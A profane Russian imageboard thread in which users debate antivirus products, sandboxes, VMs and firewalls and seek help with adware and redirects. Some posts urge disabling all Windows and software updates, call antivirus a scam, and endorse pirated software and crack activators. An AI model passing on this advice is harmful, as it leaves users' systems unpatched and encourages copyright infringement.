Хмм… проблемы с безопасностью либо есть, либо нет. Если нет, то от антивиря толку не будет. Если есть, то антивирь не спасёт. Начни с классической безопасности с разделением прав, у меня на хрюше резвился школьник 9 лет под юзерской учёткой, рингтонами он не интересовался, только зомби-играми, я ему поставил Zombie Shooter, и он в неё резался. Это кстати, тоже выход: делай людям счастье, чтобы им самим не нужно было это делать.
При установке двух антивирусов второй следует поставить в песочницу и конфликты не обнаружены.
Не использую антивирус года так с 2011, не смотря на батю скоблящего всякие русские вёсны я и прочий мусор.
Всего раз батя словил winlocker, но из-за учетной записи без прав администратора он не смог навредить больше. На случай ransomware я убрал права права на доступ к диску с данными у его пользователя.
Софт весь лицензионный либо открытый, но вы вполне можете украсть фотошоп/офис/вегас на том же рутрекере и ничего не подхватив.
мими-крокодил не читавший тред
Всего раз батя словил winlocker, но из-за учетной записи без прав администратора он не смог навредить больше. На случай ransomware я убрал права права на доступ к диску с данными у его пользователя.
Софт весь лицензионный либо открытый, но вы вполне можете украсть фотошоп/офис/вегас на том же рутрекере и ничего не подхватив.
мими-крокодил не читавший тред
Хочу просканировать на всякий случай свою пекарню, используя загрузочный диск. Что сейчас годного кроме дисков от Dr.web и Kaspersky есть?
Работаю в антивирусной индустрии, знаю суть работы внутри Dr.Web и Kaspersky. Ознакомлен с внутренним устройством антивирусных движков известных АВ, а так же по индустрии в целом, задавайте свои вопросы, если хотите.
Есть два стула. На одном пики точены, на другом хуи дрочены. Куда сам сядешь, куда мать посадишь?
Мамку на пики, сам на хуи.
Пасаны, этот свой.
Если не траль, cureit норм для проверки на виросы? Или есть что получше?
>Если не траль, cureit норм для проверки на виросы? Или есть что получше?
Как сканер для чистки компьютеров Cure.It ничего он даже более менее сложные руткиты сможет найти но что-то реально хардкорное - нет. Для хардкора - KVRT но вряд ли на твоем компьютере будут сложные вещи. В целом все "одноразовые сканеры" одинаковы для обычного пользователя который ловит винлокеры.
С точки зрения именно технологичности Dr.Web проебались с прихода туда Шарова Борьки гендиром. Сначала все по инерции шло нормально но компания превратилась в говно продающее свое имя из 90-00 годов когда там был Дмитрий Лозинский. Dr.Web абсолютно проебали весь рынок как Enterprise так и End User. Была жалкая попытка вкатиться в середине 00 через Корбину и прочих крупных провайдеров.
Ну и пища для раздумий: уволенные/ушедшие из касперского идут в Dr.Web спецы из доктора хантятся каспером.
P.S. специально без запятых чтобы не спалили по паузам во время разговоров.
А если я параноег, значит KVRT лучше сможет ловить страшные ии-руткиты от ZOG?
Да и KVRT пошлет статистику о детектированных объектах. Если у тебя что-то найдется в %USERPROFILE% при этом ты указал свой ник как логин в винде то эти данные будут видны и сохранятся в течении ~60 дней. Но видны не всем только определенные люди уборщица бухгалтер или какой-нибудь вирусный аналитик этого не узнают. В докторе так же. Так же KVRT будет запрашивать информацию в облаке каждого сканируемого объекта но там данные обезличены просто контрольная сумма и все никаких имен путей и прочего
KVRT это который бесплатный сканер от Kaspersky lab?
Kaspersky Virus Removal Tool
> Не юзай виртуалбокс.
А что тогда юзать?
>>бэкдоры и незалатанные баги
>Не юзай виртуалбокс.
Пруфы давай.
hyper-v ?!
мимо-крокодил
>Окончательное решение антивирусного вопроса
Решение в том что не нужно полагаться только на антивирус. А нужно использовать множество средств одновременно:
1) Настроить встроенный фаервол винды. Тут поможет программа WFC упрощающая настройку и показывающая подсказки если какойто программе нужен интернет. Фаервол настроить в режим блокировать все программы по дефолту, а разрешать только явно вручную указанные программы.
Замечу что сервисы могут иметь доступ к интернету/локалке даже если их нет в списке фаервола. Сервисы указаны в свойствах соединения сетевого адаптера. Они именуются там как протоколы. В Control Panel -> Network Connections -> Твоя сетевая карта -> Свойства иконки -> Тут список галочек для протоколов.
Для того чтобы DNS-трафик фильтровался по каждой программе отдельно, нужно полностью остановить сервис DNS-клиент.
2) Запускать отдельные программы с пониженными правами. С помощью Sysinternals psexec.exe. Или вообще не сидеть под админом. Поставить сложный пароль на админа.
3) Песочница (Sanboxie (Freeware)) для игр (которые скачал НЕ с официальных сайтов (steam, gog), а с варезных, с торрентов, сборников) и для теста новых програм.
Песочница изолирует диски и реестр от повреждений. Склыдывает изменения в папку C:\Sandbox. Но в отличии от виртуалки песочница позваляет иметь 3D-графику на максимальной скорости.
Песочницу без настроенного фаервола не запускать ! Помнить что песочница по дефолту имеет доступ к домашней локалке и айпи хоста. Если собираешься запускать в песочнице опасные программы то нужно запретить в фаерволе хоста для песочницы доступ в локалку 192.168.0.x и подобные подсети. Или в настройках песочницы полностью отрубить интернет.
4) Виртуалка (VMware Workstation, Virtualbox Freeware) для игр не требующих сложного 3D и для теста новых програм. Но если у вас мощная видяха, то можно и сложные 3d-игры запускать.
Помнить что виртуалка по дефолту имеет доступ к домашней локалке и айпи хоста. Если собираешься запускать в виртуалке опасные программы, то нужно запретить в фаерволе хоста для виртуалки доступ в локалку 192.168.0.x и подобные подсети. Подразумевается что нужно использовать nat-соединение в виртуальном компьютере и на хосте фаерволить именно этот nat-процесс. А если используете bridge-соединение, то тут нужно создавать дополнительный вирт. комп. и пропускать и фильтровать (фаерволить) трафик через него. Т.к. бридж трафик на хосте не фаерволится. Т.е. один комп как фаервол подключённый как бридж к сетевой карте, а второй комп непосредственно для работы/игр.
5) Бекапы. Использовать программу FreeFileSync (freeware) в режиме mirror. Бекапить на разные диски. Не копировать на тот же самый диск. Под дискам подразумеваю разные устройства (жёсткие диски, SSD, флешки), а не логические диски C:, D: и тп. Если один диск накроется от естественного износа, то копия файлов останется на другом.
6) Для продвинутых. Использовать линукс (дебиан) в виртуалке для выхода в интернет. Вместо виндовс. (Если нужно будет использовать Wine то потребуется настройка iptables которая в линуксах по дефолту пропускает любой трафик.)
7) Для продвинутых. Использовать линукс-контейнеры в виртуалке для запуска постоянно запущенных программ-сервисов (торренты, различные файлообменные программы, видеосвязь скайп и аналоги, и др).
8) Использовать множество профилей браузера для различных целей. Вместо одного общего. Лучше если браузеры запускаются в разных юзерах.
9) Ещё раз. Бекапы, бекапы, бекапы. Множество бекапов (копий) на разных дисках (устройствах).
10) Клоуды предназначены для моральных уродов. Там ничего не шифруется. А то что шифруется на самом деле обманка (подстава). Барыги всегда стучат в полицию при нахождении подозрительных файлов. Были случаи. С посадками.
11) Антивирусы предназначены для гнойных наркоманов. И шизиков. Которые не понимают что современные антивирусы это наёбка. Т.к. антивирусные компании просто эксплоатируют юзерскую беспечность (когда юзер не использует или не настраивает фаервол, это аналогично открытым дверям в свою квартиру, устраивают проходной двор) и навязывают ренту (дань) за получение магической защиты (аналогично продаже амулетов, пожертвования богам). Антивирусные компании любят часто кудахтать о вирусах, хакерах, троянах и тд чтобы стимулировать продажи, но при этом полностью скрывают что в виндовс уже есть инструменты для полного противодейтсвия вирусам.
12) Отключение виндовс апдейтов, и обновления во всех программах чтобы барыги не устанавливали, не меняли версии установленных программ. Т.к. новые версии бывают часто хуже старых. И вообще только в редких случаях нужно обновлять софт. Если нужно часто обновлять софт то его лучше установить в виртуалку или линукс-контейнер.
13) Совремнные виндовс 7/8/10 содержат шпионские трояны отсылющие ворованные данные на сервера майкрософт о том какие файлы хранятся у вас на дисках, что вы устанавливаете на компьютер. Поэтому нужно обязательно перенастроить фаервол в параноидальный режим, запретить апдейты и интернет для всех сервисов виндовс. Я за этого президента/депутатов не голосовал, соблюдать их законы не обязан.
быдлоодмин закукарекал
> WFC
Дрочую, встроенному фаерволу в винде на полном серьёзе нужен был только гуй человеческий, хоть бы и сторонний.
> не требующих сложного 3D
У меня в вмваре даже без пердолинга Unigine Valley набирал 1400 попугаев при том, что на живом железе было 1800 на максималочках, если железо может в аппаратную виртуализацию, всё заебись будет. Но это в соответствующий тред лучше.
> Использовать линукс (дебиан) в виртуалке для выхода в интернет. Вместо виндовс.
Оверхед. Достаточно не пользоваться всякими зондваре и не шариться по помойкам.
> множество профилей браузера
Опять оверхед. Портабл инстансы и юзаться могут одновременно, и пердолинга меньше.
> Клоуды предназначены для моральных уродов.
Есть конфиденциальная информация, которую лучше в голове держать, а есть потребности вроде коллекционирования мемных картинок в гуглодрайв чтобы постить их с любого устройства, даже с тюбетейки Аллаха. Ну и овнклауды всякие.
> Антивирусы предназначены для гнойных наркоманов. И шизиков. Которые не понимают что современные антивирусы это наёбка.
Моим подопечным долбоёбам помогает ловить распространённых червей и малварь, на большее антивирус и не претендует.
> Отключение виндовс апдейтов
На мой видеочип только из шиндовсапдейта рабочий драйвер прилетает, с официальным "штабильным" постоянно танцы с бубном. Всё под одну гребёнку чешешь, не надо так.
> 7/8/10 содержат шпионские трояны
В 7 и 8 отключается удалением конкретного пакета обновления, в 10 через групповые политики и банальный uBlock.
Эникей со стажем вкатывается в тред.
Групповые политики и анальные запреты - годно для маленького офиса, или какого-нибудь колл-центра, иначе заебут всякие ебанутые топ манагеры, и начальство, они-то как раз и протащат какое-нибудь говно, которое перекинется на прочие незащищённые компьютеры. И я не знаю как у других, но у нас Windows Phone спокойно подключает свою память ко всем компам.
MS хуитки - амулет для хомячков, и охотник за кряками, может выебать слабенький компьютер не хуже майнера.
Каспермский - выглядит охуенно, дохуя фич, по ощущениям уже не тормозит как в те времена, а вот по прямому назначению могут случиться глупые обосрамсы, когда он не может выкорчевать заразу, были баги со скачиванием обновлений.
Cure it - заебись работает, с десктопным вариантом почти не встречался.
Malwarebytes - напоминает поделие Васяна на скриптах, находит в глубинах харда неизвестно что, но скорее работает чем нет, вроде неплохо помогает от блокираторов и рекламной хуеты.
Симантек - неповоротливое говно с кучей багов, при этом любят выдавать громкие новости о борьбе с угрозами, сорт оф заморский Касперский.
Есет - просто антивирус, который делает свою работу, весьма хорошо делает, главное обновлять.
Аваст - использую дома, главное при установке выпилить не нужное чтобы не докучал всякой фигнёй, тогда получается то же самое что есет, но бесплатно и без регулярной ебли. Не годится для предприятия, ибо не имеет глобального центра управления и обновления.
Групповые политики и анальные запреты - годно для маленького офиса, или какого-нибудь колл-центра, иначе заебут всякие ебанутые топ манагеры, и начальство, они-то как раз и протащат какое-нибудь говно, которое перекинется на прочие незащищённые компьютеры. И я не знаю как у других, но у нас Windows Phone спокойно подключает свою память ко всем компам.
MS хуитки - амулет для хомячков, и охотник за кряками, может выебать слабенький компьютер не хуже майнера.
Каспермский - выглядит охуенно, дохуя фич, по ощущениям уже не тормозит как в те времена, а вот по прямому назначению могут случиться глупые обосрамсы, когда он не может выкорчевать заразу, были баги со скачиванием обновлений.
Cure it - заебись работает, с десктопным вариантом почти не встречался.
Malwarebytes - напоминает поделие Васяна на скриптах, находит в глубинах харда неизвестно что, но скорее работает чем нет, вроде неплохо помогает от блокираторов и рекламной хуеты.
Симантек - неповоротливое говно с кучей багов, при этом любят выдавать громкие новости о борьбе с угрозами, сорт оф заморский Касперский.
Есет - просто антивирус, который делает свою работу, весьма хорошо делает, главное обновлять.
Аваст - использую дома, главное при установке выпилить не нужное чтобы не докучал всякой фигнёй, тогда получается то же самое что есет, но бесплатно и без регулярной ебли. Не годится для предприятия, ибо не имеет глобального центра управления и обновления.
>коллекционирования мемных картинок
Я писал не о смешных картинках предназначенных специально для публикации в интернете. А о варезе (фильмах, играх, музыке, книгах) и личных документах и тп.
>Моим подопечным долбоёбам помогает ловить распространённых червей и малварь,
А какже с малораспространёнными или полиморфными ? Не поможет твой антивирусник. Антивирусы ищут по шаблону который есть в их базе. А в базе лишь самые попсовые записи о вирусах. Помню однажды у касперского была функция днс филтра и каспепский сливалт все днс запросы себе на сервер. Также антивирусы под видом статистики сливают на свои сервера данные о твоих файлах. Антивирусы лишь создают иллюзию безопасности.
>На мой видеочип только из шиндовсапдейта рабочий драйвер прилетает, с официальным "штабильным" постоянно танцы с бубном.
А зайти на сайт производителя Nvidia, Amd, Intel не судьба ?
> 7/8/10 содержат шпионские трояны
> В 7 и 8 отключается удалением конкретного пакета обновления, в 10 через групповые политики и банальный uBlock.
Сёдня ты отключил одни обновления. Завтра придут другие обновления с встроенными шпионскими функциями. Майкрософт доверять нельзя.
> 7/8/10 содержат шпионские трояны
>отключается ... в 10 через ... банальный uBlock.
> uBlock
> uBlock
uBlock предназначен для браузеров. Он не подходит для блокировки майрософтских шпионов.
> варезе
Кроме зашкварного мейлру и слоупочной меги и китайских облаков разве кто-то даёт достаточно места под это?
> малораспространёнными или полиморфными,
В одноглазниках не встречается. Особенно если научить пользоваться рутрекером и, если мозгов хватает, фаерволлом.
> зайти на сайт производителя
Вот оттуда косячный драйвер и берётся. В репозиториях шиндовса хоть и ноябрьская некрота, но хоть штабильная. Тот же каталист поди найди за тот же ноябрь, чтобы не на депозитфайлсе или прочей помойке лежал.
> Сегодня Х, завтра Y
Вотзавтра и почитаю описание к обновлениям.
> uBlock
Пардон, опечатался, там PeerBlock должен быть. Плюс где-то в закладках был ман как на моём зухеле аналогичное нарулить через iptables, если маразм закрепчает совсем.
360 total security.
С потенциальным китайским зондом в жопе я готов мириться.
Так ли он охуенен в плане секьюрити, как заявлено?
С потенциальным китайским зондом в жопе я готов мириться.
Так ли он охуенен в плане секьюрити, как заявлено?
Поясните за виндовый антивирус.
Накатываю пиратский софт да, на этом можно было закончить. Установил, запускаю активатор. Активатор лечит софтину.
Через полминуты Defender вываливает предупреждение. Это норма? Всякие авасты спрашивают такие вещи до запуска.
>А какже с малораспространёнными или полиморфными
анализ поведения, не не слышал?
скажи еще av 0day вообще не блочат.
>Поясните за виндовый антивирус.
поясняю
https://www.shadowserver.org/wiki/pmwiki.php/AV/Virus180-DayStats
ищешь строку "microsoft", сравниваешь с другими.
Ох, помню годовую бесплатную лицензию на Аутпост отхватил с какого-то сайта типа шареваре-он-сэйл или как-то так.
>Аваст - использую дома, главное при установке выпилить не нужное чтобы не докучал всякой фигнёй, тогда получается то же самое что есет, но бесплатно и без регулярной ебли. Не годится для предприятия, ибо не имеет глобального центра управления и обновления.
Я сам не пользовался на предприятиях, но там же вроде есть облачная бизнес версия.
А Каспер и прочий мейнстрим до сих пор пропускают поделия вроде йобапаков?
Мимо слоупок.
Мимо слоупок.
Baidu Antivirus норм?
Лучше таки Cezurity Scanner.
Хороший членик, мне понравился. Еще накадайте.
Анончик, поймал такую штуку как MewsSpy.AR. Как избавиться? Прогнал антивирусником пеку, ничего не нашло, но сообщения периодически всплывают, например при попытке скинуть экзешник какой-то программы на флешку. Что делать, чем лечить?
Хуёвым антивирусником прогнал. И флешку не почистил, что ли?
AVZ, Касперский, Нод, ДРВеб, всем прогнал, показывает что файл чист пока не начинаешь выполнять действий с ним
Ну и вот, что вирустотал нарисовал про один из экзешников http://i.imgur.com/PmzUIFm.png
Пришло время. Ты сам это уже чувствовал где-то в закромах сознания.
> цп, майнкампф на всех языках, кухня домашнего террориста, агитационные видео игил
ты так говоришь будто тебе такое не подкинут при случае…
Хотел скачать fb2 reader. нашел в инете сайт с ним, и не подумав скачал себе на ноут. попробовал установить. в итоге мне на ноут установилось до жопы левого софта, браузеры открывают всякую хуйню при запуске, а проц грузится на 60-70%. одна из программ называлась adwanced system care. судя по отзывам она знатно засирает систему. пытаюсь сейчас исправить все с помощью аваста, но пока не получается. посоветуйте что делать пожалуйста? у меня хард разбит на два раздела. на одном только винда, на другом игры, фильмы и все в таком духе. есть установочная флешка с семеркой.
Поймал Шифратор breaking_bad существует ли Дешифратор?
Читал что kaspersky может помочь, но нужна регистрация у них.
Может у кого есть лицензия поможете?
Читал что kaspersky может помочь, но нужна регистрация у них.
Может у кого есть лицензия поможете?
Но ты же самый умный. Из тех, кому антивирус нинужен. И анальные зонды в виде SmartScreen, небось, первым делом отключил. А умные люди как правило зарабатывают достаточно, чтобы купить лицензию самому.
>2016
>антивирусы
Но ведь он действительно не нужен.
Зачем копировать? Пусть живёт в песочнице и не срёт в систему. Зато деинсталляция быстрая и удобная.
>Но в отличии от виртуалки песочница позваляет иметь 3D-графику на максимальной скорости.
Херня. Дело не в графике, а в CPU (для cpu-кода есть приличный оверхед, если система не имеет nested paging (даёт приличный оверхед на обращения к памяти, так как вместо использования tlb (который находится в ведении ОС, nested paging добавляет ещё один аппаратный tlb, но уже для виртулки) виртуалке приходится его программно эмулировать) и VT-d (системы на core2 не имеют)) и поддержке directx. Furmark отлично работает что на Windows в virtualbox, что на Reactos в ней же. А разгадка проста: используется исключительно OpenGL. Аналогично с the elder scrolls skyrim (я её сначала поставил в виртуалку).
>11) Антивирусы предназначены...
Хуита. Антивирусы должны детектить уже известные вредоносы, распространяемые через инет (это их основная функция - сигнатурный детект) и делать поведенческий анализ, то есть ловить дерьмо, впариваемое лохам. Словить запакованную или не известную малварь они не в состоянии, к сожалению, но против неё должны действовать другие эшелоны.
>12) Отключение виндовс апдейтов, и обновления во всех программах чтобы барыги не устанавливали, не меняли версии установленных программ.
Зависит от модели угроз. На данный момент применимо только к винде (с ручным обновлением после прочтения описания в предположении, что в апдейтах нет незадекларированной функциональности).
>Т.к. новые версии бывают часто хуже старых. И вообще только в редких случаях нужно обновлять софт. Если нужно часто обновлять софт то его лучше установить в виртуалку или линукс-контейнер.
Бывают, но обычно новые версии лучше старых.
>13) Совремнные виндовс 7/8/10 содержат шпионские трояны отсылющие ворованные данные на сервера майкрософт о том какие файлы хранятся у вас на дисках, что вы устанавливаете на компьютер. Поэтому нужно обязательно перенастроить фаервол в параноидальный режим, запретить апдейты и интернет для всех сервисов виндовс.
в семёрке и восьмёрке всё отключается при установке. Десятка - ненужное говно.
>Я за этого президента/депутатов не голосовал
Это вообще к чему? О каких конкретно законах речь идёт? Я не знаю ни одного закона ни в США ни в РФ, предписывающего разработчикам ОС вставлять в ОС зонды, ворующие данные.
>Furmark отлично работает ...
Сколько FPS у тебя показывал Furmark в виртуалке и на реальном железе ?
> Аналогично с the elder scrolls skyrim ...
Сколько FPS у тебя показывал skyrim в виртуалке и на реальном железе ?
Или ты не сравнивал ? Лишь на глазок оценил ? Значит твои радостные возгласы нихуя не значат пока ты не сделаешь правильное сравнение.
>посоветуйте что делать пожалуйста?
Autoruns.exe от Sysinternals.
Зачем ты полез на этот левый сайт? Почему не погуглил сначала в вики, не спросил анончиков? Эх, ты, мы тут учим-учим безопасности в цифровом мире, советуем кучу годноты, друг за друга если что постоим, а ты вот так, полез в лужу назло всем. Нехорошо!
Читаю охуительные истории, про то, что антивирус сканит за 10 секунд и вспоминаю историю про йоба архиватор на дискетах из середины 90-х.
Cкачал x86 версию и это говн омне пишет что у меня 64 битная система и качай блять такой же экзеник, это гвоно не в курсе что x86_64?
> 2016
> не уметь найти офсайт программы в карточке в вики
Как можно быть таким дауном-аутистом...
> не уметь найти офсайт программы в карточке в вики
Как можно быть таким дауном-аутистом...
Посоветуйте софтин-песочниц.
Minecraft
ещё варианты
Посоны, посоветуйте нормальную программу для быстрого чекинга вирусов, но шоб не засирало систему и потом можно было снести.
Kaspersky vs NOD32 vs Microsoft Defender/Antimalware Service?
последние версии kis ставят свой сертификат в корневые доверенные и заменяют свои сертификатом все остальные. нахуй нахуй.
ставь авиру
>ставят свой сертификат в корневые доверенные и заменяют свои сертификатом все остальные
Ты про что? Какие сертификаты?
>ставь авиру
Она же вроде хуйней всегда была, не? Уровня аваста
Шо та хуйня, шо аваст хуйня лучше поделок от касперского
>Какие сертификаты?
https://www.digicert.com/ssl-certificate.htm
такие. это дает возможность читать весь шифрованный ssl трафик.
>Она же вроде хуйней всегда была
да какбе нет
https://www.shadowserver.org/wiki/pmwiki.php/AV/Virus180-DayStats
Но ведь эти сертификаты зашиты в коде браузеров, разве нет??? Это ведь для https, я правильно понимаю? Браузер же не должен давать ходить по таким сайтам с левым сертификатом
И правда. Очевидно, для того, чтобы обрабатывать https-соединения.
Мне вот только интересно, они разные сертификаты генерируют для каждого ПК? Просто если вдруг один и тот же, то не составит особого труда его вытащить и использовать для MITM юзеров каспермского.
>да какбе нет
Хуета какая-то.
Касперыч же топом всегда считался, даже лучше того же есета.
>разве нет???
Нет, ты в любой момент отредактировать их список через хранилище в винде.
>Это ведь для https, я правильно понимаю?
Да, по сути он подтверждает что сайт, к которому ты обратился является сайтом, к которому ты хотел обратиться.
>Браузер же не должен давать ходить по таким сайтам с левым сертификатом
Если сертификата нет в списке доверенных, или срок действия сертификата истек (например когда ты пилишь самоподписанный сертификат чтобы на своем сайте хттпс работал) то браузер ругнется, мол внимание сертификат выдан хуй знает кем. Но тем не менее можно нажать "окок я знаю" и зайти на сайт. В случае касперского он добавляет свой сертификат в доверенные и когда ты идешь на любой сайт, который подписан центром digicert например, ты вместо сертификата digicert увидишь сертификат касперского. Браузер ругаться не будет, потому что сей сертификат в доверенных.
Подобная хуйня дает возможность читать шифрованый трафик. Точно так же например делает программа fiddler, которая нужна для того, чтобы смотреть что куда ходит и что там в трафике, даже шифрованом, разница в том, что фидлер предупреждает тебя об этом и их сертификаты называются DO_NOT_TRUST
>shadowserver
>хуета
Зачем ты такое тупое, быдло.
Давай-давай я тебе отвечу, чтобы тебе не горело от игнора.
>Мне вот только интересно, они разные сертификаты генерируют для каждого ПК? Просто если вдруг один и тот же, то не составит особого труда его вытащить и использовать для MITM юзеров каспермского.
Сам как думаешь?
Репорт шитпостера.
Думаю, что разные, но проверять лень.
Кому тебе, там только один пост мой, чини детектор.
Везде разные, только от этого легче не становится.
Kaspersky vs NOD32 vs Microsoft Defender/Antimalware Service? Ну vs Avira vs Avast, окей.
Недостаточно данных.
Но особой разницы в защите для тебя не будет. Различие в особенностях.
>Различие в особенностях.
Пили
>Недостаточно данных.
Какие конкретно данные нужны?
Задача - ловить хуйню, которую пропустил более-менее опытный юзер (говно с депозита не качаю, кейгены проверяю вирустоталом).
> Какие конкретно данные нужны?
Ты забыл уточнить, ты готов купить лицензию, или ты рассматриваешь только бесплатные варианты?
> Пили
Да что пилить. Например, у Касперского проактивная защита, если говорить о полной версии, у остальных ее нет, разве что у нода какие-то зачатки. Каспер терпимо относится в кряками кейгенам. А вот у Авиры будет много ложных срабатываний. Но чайникам это и не повредило бы. Зато, люблю немецкую пунктуальность, что вирлаб всегда отвечает по любой чепухе, которую им отправишь. (Кроме выходных). Касперу в этом отношении похуй кто что им отправляет. Последний раз не только не добавили potentially unwanted programs, но даже не ответили. Больше даже посылать им ничего не стану, надоело. Про Defender я точно не знаю, он же обновляет базы через центр обновления Windows? Если так, тогда это требует автоматической установки обновлений в настройках, мне это не нравится. Частота обновлений тоже вызывает вопросы. Вот такие мелкие особенности.
->
Да, спасибо, видел.
Ну хуй знает, у нода бесплатная хуйня, но в любом случае, могу себе позволить и потратить 1.5к в год, лол. Навязчивую хуйню не люблю. Проактивная - это на неизвестную хуйню?
Кококо одей зараза-хуяза кудахпокпок виртуалка-хуялка кукареку порезанные права-хеува, касперский-хуерский, нод-хуёд. Это все хуета из-под ногтей. Сигнатурные антивирусы - все поголовно шляпа, а эвристика в них как двадцать лет назад была говном, так и осталась. Плюс самую популярную хуету вроде мелкой мутной рекламной малвари они не ловят от слова совсем. Сколько раз наблюдал, как в вирустотале, к примеру, заведомо горячий бинарник получает аппрувы и зеленый свет от всего говна, что тут поназывали, не перечесть просто. Авасты ваши, авиры, докторвебы ебаные - всё тлен и шляпа. А что же тогда не шляпа, спросите вы? Для того, чтобы нормально жить и не заёбываться все этой унылой залупой, необходимо и достаточно иметь всего ничего - зачатки здравого смысла и минимальное понимание угроз и векторов атаки. Если это у тебя есть - антивирус тебе не нужен. Если этого нет - антивирус тебя не спасет, такие дела.
Аноны, такая хуйня приключилась. На 10ке не было антивируса, стоял системный и как-то жил. Вчера скачал программу, которая оказалась набита вирусней. И понеслось - весь вечер на комп устанавливалось какое-то говно, миллион программ всяких ебанутых. Скачал антивирус, проверил, охуел от количества вирусов, все удалил.
Но осталась проблема. Сижу с оперы. На многих сайтах происходит редирект на какую-то хуйню. Иногда вылезает баннерная хуйня во весь сайт, которая не блокируется адблоком. Короче я охуеваю просто.
Антивирус это не пофиксил, хотя я повторно потом сканил. Скажите, что сделать с этим можно?
Но осталась проблема. Сижу с оперы. На многих сайтах происходит редирект на какую-то хуйню. Иногда вылезает баннерная хуйня во весь сайт, которая не блокируется адблоком. Короче я охуеваю просто.
Антивирус это не пофиксил, хотя я повторно потом сканил. Скажите, что сделать с этим можно?
Бочку. hosts
>2016
>антивирусы
проактивная это типа анализ поведения.
есть даже в бесплатной авире
Какая проактивная защита, о чем вы? Я еще кое-как поверю в эвристику, но все эти ваши хипсы-хуипсы - развод.
хочу поставить G Data TotalProtection норм или нахкй?
>G Data TotalProtection
нахуй
Виртуальная машина лучше любого антивируса. Ни один из антивирусов не защищает от 0day уязвимостей.
что так ?
Доступа к памяти нет, так как виртуалка выделяет пространство, в котором работает эта самая виртуалка, там даже доступа к реальному процессору нет, лишь к части его адресного пространства в его виртуальном аналоге.
Причём даже это можно запретить, сняв галку в BIOS, если ты уж совсем параноик.
Да эти дауны видят только маркетинговый бред, в корне не понимая, что антивирус это просто сканер известных вирусов. Если вируса нет в базе, ни один антивирус не знает, так и должно быть или нет.
Поэтому в последнее время при установке дров, биос и даже некоторых программ просят отключать антивирусы. Как раз из-за "проактивности", которая блокирует адекватный софт, но вполне может пропустить черви просто потому, что ещё не занесла их в базу, так как не все вирусы и черви работают сразу.
Обычно у каждого паразита есть дата пробуждения, когда уже софт установлен и работает некоторое время, а юзер обманутый антивирусом считает, что он в безопасности.
>антивирус это просто сканер известных вирусов
держи нас в курсе
>69%
Прости, я хотел сказать решето.
тамщемта там 69% просто из-за малой выборки.
в среднем ~50% при первом обнаружении и до 70-80% при ретраях в течение 48 часов.
даже 50% лучше чем нихуя, а 80% в течение 48 часов вообще норм.
69% это и есть нихуя. Виртуалку выше уже называли. Присоединяюсь к адекватам. Наивные продолжают верить в антивирусы.
отреж кабель параноик
>параноик
>не ставит антивирусы
чет я не знаю даже
>Виртуалку выше уже называли
И как тебя виртуалка защитит от дыр в браузере или блядь в прочем софте? Или мне вообще все в виртуалке запускать?
Такая проблема, все время реддиректит с одного сайта. Захожу на %сайт_нейм% клацаю нужную мне бложню и меня перекидывает на какую-то не до конца загрузившуюся новостную хуйню или хуйню с пиздами. Проверил всевозможными перделками, адвклинером, мальваребитсом, хитманомпро, кюритом. Нихуя нет. На всех браузерах так.
В чем может быть дело? Я даже шиндовс переставил хотя давно уже пора было. Что это за хуйня?
В чем может быть дело? Я даже шиндовс переставил хотя давно уже пора было. Что это за хуйня?
в роутере днс смотри
У меня хуясус, там что-то днс не видно. Лол. Ну или я тупой. Сейчас погуглю.
Тем временем мелкомягкие чёто там намутиили со своим дефендером, вот вам сурьезная видяшка, лол:
https://www.youtube.com/watch?v=h9xS7mhi1BA
https://www.youtube.com/watch?v=h9xS7mhi1BA
>в роутере
СПЕШИТЕ ВИДЕТЬ НОВЫЙ ADWARE СОФТ КОТОРЫЙ ПРОПИСЫВАЕТ СЕБЯ В РОУТЕР
test
Внезапно смена днс помогла. Теперь страница с говном и нужная страница просто не открывается. Лол.
Через прокси или анонимайзеры все нормально открывается. Лул. Таки может еще предложения будут? Щито это может быть?
слоу
слоу
Опять хуйня с нонейм-сайтом и нонейм-говном антивирями. ФСЕКЬЮРЕ, БЛЯДЬ, ГОСПОДИ, КЛАМ под виндой, какой же ёбаныйм бред, ИКАРУС. Просто хуйня, запиленная хуесосами. Нашли какую-то обоссанную статью, теперь трясутся с ней, как могут. Шедоу, Вирус Буллетин, антималваре - все дают разные результаты в пользу того же эсета/авиры/аваста/касперского, кто тут еще на что дрочит, и в пользу нонеймов, все противоречат друг другу...это хуйня все маркетинговая и проплаченная.
>хуйня с нонейм-сайтом
>нонейм-сайтом
>shadowserver.org
>noname
Так помогла смена днс в роутере или нет?
Чего сказать хотел, зелень?
И что это, при чем тут eff долбоебина?
Так злишься, что запятые глотаешь, лама? Первое фоундейшн, связанное с безопасностью, пришедшее мне в голову, взято для чистоты сравнения. Жаль, что ты тупой и приходится это разжевывать, я было подумал, что ты в состоянии поддерживать дискас. Отдыхай.
Винда нужна только для игр. Для всего остального - линукс
Монтаж, работа с аудио, трехмерное моделирование, кады, графика, скайп...
> Монтаж, работа с аудио, трехмерное моделирование, кады, графика,
В линукс пора переносить.
> скайп...
Ехали зонды через зонды
>Ехали зонды через зонды
>Google Android
Однопроцентники такие однопроцентники.
Вот сейчас бросятся переносить ради одного процента.
Не монтажу, аудио только слушаю, не моделирую, не кадю, гимпа хватает для бытовых нужд, скайпом не пользуюсь.
Читаю, лазю в интернетике, кодю, слушаю музыку и смотрю аниме. Всё это пингвин умеет лучше, быстрее и удобнее винды.
Каждому по потребностям же. Ну и ты, конечно же, каждый день монтажишь и моделируешь. С утреца так, пока посвежее голова. Ну и какой выходной без проекта в каде, естественно.
Да не бросятся, просто нужно донести до людей мысли, что несвободное по нарушает их конфиденциальность.
И че? Нет нормальных мобильных ОС. Вообще нет. Не сидеть с них что ли теперь?
Когда перенесут, тогда придешь.
Зонды, зонды еверивэа...НИНУЖНА!1
Так и говори: линукс подходит для браузинга, для остального только винда.
>Первое фоундейшн, связанное с безопасностью, пришедшее мне в голову, взято для чистоты сравнения.
>не видит разницы между eff - организацией, продвигающей идеи анонимности среди широкой аудитории и им необходима публичность и shadowserver - сообщества экспертов-сотрудников различных организаций занимающихся кибербезопасностью, которым тащемта похуй на публичность.
как-то раз не смог обновть мсе на пк, с тех пор сижу без антивируса. антивирусы реально не нужны.
>кококо, нинужна, кококо
Ну давай сравним с virus bulletin?
давай ты для начала зайдешь на shadowserv и почитаешь немношк
Заходил, посмотрел, нахуй пусть идут.
Еще вопрос к вопросу
Проверил этот сайтец с телефонки и планшета. Подключался через вайфай, тоже самое, не открываются бложни или показывают письки/другую хуйню. Это даже не реклама, а просто картиночки. Блядь, даже с котиками были.
Скинул роутер к заводским настройкам. Поставил йоба пароль/йоба админку. Проверил. Дело не в роутере.
